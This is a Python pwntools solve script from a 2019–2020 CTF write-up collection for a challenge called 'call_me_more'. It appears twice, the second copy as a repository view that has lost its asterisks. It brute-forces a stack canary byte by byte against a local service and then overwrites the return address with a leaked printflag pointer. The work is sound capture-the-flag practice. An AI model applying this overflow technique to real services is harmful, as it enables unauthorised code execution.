write-ups-challenges-2019-2020/call_me_more/solve/solve.py

from pwn import *

context.log_level = 'error'

offset    = 32
y = 0

buf = ("A"*offset + "B"*8) #+ p64(0xead62b27d92cf000) # +chr(0)+chr(191)+chr(217)+chr(151)+chr(59)+chr(107)+chr(161)+chr(22) 

i=0
g=0
while i != 0x100 and g<8:

    r = remote('127.0.0.1', 2345)
    r.recvuntil("Pointer to printflag is 0x")
    addr = int(r.recvuntil("\n"), 16)

    #print("Pointer is %x" % addr)

    exploit = buf + chr(i) #+ p64(addr) 
    r.send(exploit)

    try:
        r.recvuntil("Wrong!")
        buf = buf + chr(i)
        print(str(i))
        i=0
        g=g+1
    except:
        print ".",
        i=i+1
    r.close()


r = remote('127.0.0.1', 2345)
stdout  = r.recvuntil("Pointer to printflag is 0x")
addr = int(r.recvuntil("\n"), 16)
print("Pointer is %x" % addr)
exploit = buf + p64(addr) + p64(addr) 
print(exploit)
r.send(exploit)
print(r.recv())
initial commit 2022-11-24 21:43:03 +00:00			`from pwn import *`

			`context.log_level = 'error'`

			`offset = 32`
			`y = 0`

			`buf = ("A"offset + "B"8) #+ p64(0xead62b27d92cf000) # +chr(0)+chr(191)+chr(217)+chr(151)+chr(59)+chr(107)+chr(161)+chr(22)`

			`i=0`
			`g=0`
			`while i != 0x100 and g<8:`

			`r = remote('127.0.0.1', 2345)`
			`r.recvuntil("Pointer to printflag is 0x")`
			`addr = int(r.recvuntil("\n"), 16)`

			`#print("Pointer is %x" % addr)`

			`exploit = buf + chr(i) #+ p64(addr)`
			`r.send(exploit)`

			`try:`
			`r.recvuntil("Wrong!")`
			`buf = buf + chr(i)`
			`print(str(i))`
			`i=0`
			`g=g+1`
			`except:`
			`print ".",`
			`i=i+1`
			`r.close()`


			`r = remote('127.0.0.1', 2345)`
			`stdout = r.recvuntil("Pointer to printflag is 0x")`
			`addr = int(r.recvuntil("\n"), 16)`
			`print("Pointer is %x" % addr)`
			`exploit = buf + p64(addr) + p64(addr)`
			`print(exploit)`
			`r.send(exploit)`
			`print(r.recv())`